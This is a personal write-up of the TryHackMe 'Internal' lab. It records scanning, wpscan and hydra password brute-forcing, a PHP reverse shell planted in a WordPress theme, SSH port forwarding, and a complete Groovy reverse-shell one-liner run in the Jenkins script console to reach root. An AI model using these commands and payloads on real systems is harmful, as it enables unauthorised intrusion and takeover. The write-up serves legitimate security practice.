wd-tryhackme-internal

Posted on In Views: Disqus: Word count in article: 870 Reading time ≈ 3 mins.
wordpress, port forward, jenkins

internal

internal

scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
➜  tmp rustscan -a 10.10.103.231
Open 10.10.103.231:53
Open 10.10.103.231:22
Open 10.10.103.231:80

➜  tmp nmap -p 80 10.10.103.231 -sV
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

➜  tmp gobuster dir -u http://10.10.103.231/ -w /usr/share/dirb/wordlists/big.txt
...
/blog                 (Status: 301) [Size: 313] [--> http://10.10.103.231/blog/]
/javascript           (Status: 301) [Size: 319] [--> http://10.10.103.231/javascript/]
/phpmyadmin           (Status: 301) [Size: 319] [--> http://10.10.103.231/phpmyadmin/]
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.103.231/wordpress/]


➜  tmp gobuster dir -u http://internal.thm/blog/  -w /usr/share/dirb/wordlists/big.txt
/wp-admin             (Status: 301) [Size: 320] [--> http://internal.thm/blog/wp-admin/]
/wp-content           (Status: 301) [Size: 322] [--> http://internal.thm/blog/wp-content/]
/wp-includes          (Status: 301) [Size: 323] [--> http://internal.thm/blog/wp-includes/]

# idk why the archlinux package wpscan doesn't work
# it's easy to use docker and gem install too
➜  ~ sudo docker run -it --rm -v /usr/share/wordlists/passwords:/passwords wpscanteam/wpscan --url http://10.10.103.231/blog --usernames admin --passwords /passwords/rockyou.txt

# or

➜  ~ wpscan --url http://10.10.103.231/blog --usernames admin --passwords ctf/tool/dic/rockyou.txt

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys


find a user pass

http://internal.thm/blog/index.php/2020/08/03/5/

Posted on August 3, 2020 by admin Private:

To-Do

Don’t forget to reset Will’s credentials. william:arnold147

1
2
3
4
5
# dosen't work
➜  tmp ssh william@internal.thm
Warning: Permanently added 'internal.thm' (ED25519) to the list of known hosts.
william@internal.thm's password:
Permission denied, please try again.

php reverse shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
# add Pentestmonkey's reverse shell to 404.php
http://internal.thm/blog/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen

➜  ~ nc -lvnp 5555
# try a page cause 404
$ whoami
www-data

$ ls *
...
opt:
containerd
wp-save.txt

tmp:
coffee-MOfmAD.tmp
espresso-vRoAgt.tmp
sandwich-m1F8Xe.tmp


# get nothing
find / -type f -name 'User.txt' 2>/dev/null

$ sudo -l
sudo: no tty present and no askpass program specified

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/$


www-data@internal:/$ sudo -l
sudo -l
[sudo] password for www-data:

# try
william:arnold147
[sudo] password for www-data: arnold147

Sorry, try again

# remember the file in opt
www-data@internal:/$ cat /opt/wp*
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
# switch to aubreanna now
# but there is another way to find the file is use linpeas.sh

➜  ~ ssh aubreanna@internal.thm

aubreanna@internal:~$ whoami
aubreanna

aubreanna@internal:~$ cat user.txt
# flag1 here
# i have spend nearly two hours to find this flag XD

aubreanna@internal:~$ sudo -l
[sudo] password for aubreanna:
Sorry, user aubreanna may not run sudo on internal.

aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080


aubreanna@internal:~$ curl 172.17.0.2:8080
<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/><script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:

Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->

</body></html>

port forward

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
➜  ~ ssh -L 9999:172.17.0.2:8080 aubreanna@internal.thm

# in browser, get jenkins service, a login page
http://localhost:9999/

# this still useless?
william:arnold147

# slow but -t needs to be a number between 1 and 64
➜  dic hydra 127.0.0.1 -s 9999 -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:F=loginError" -l admin -P /home/arch/ctf/tool/dic/rockyou.txt -t 64

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 02:09:03
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~224132 tries per task
[DATA] attacking http-post-form://127.0.0.1:9999/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:F=loginError
[STATUS] 599.00 tries/min, 599 tries in 00:01h, 14343799 to do in 399:07h, 64 active
[STATUS] 580.33 tries/min, 1741 tries in 00:03h, 14342657 to do in 411:55h, 64 active
[9999][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-16 02:14:16


# login and open script console to get reverse shell
# String host="10.2.30.143";int port=5557;String cmd="bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

➜  dic nc -lvnp 5557
Connection from 10.10.103.231:33994
whoami
jenkins

ls *
opt:
note.txt

cat /opt/note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you
need access to the root user account.

root:tr0ub13guM!@#123
➜  ~ ssh root@internal.thm

root@internal:~# ls
root.txt  snap
root@internal:~# cat root.txt
# flag2 here

hard level is really hard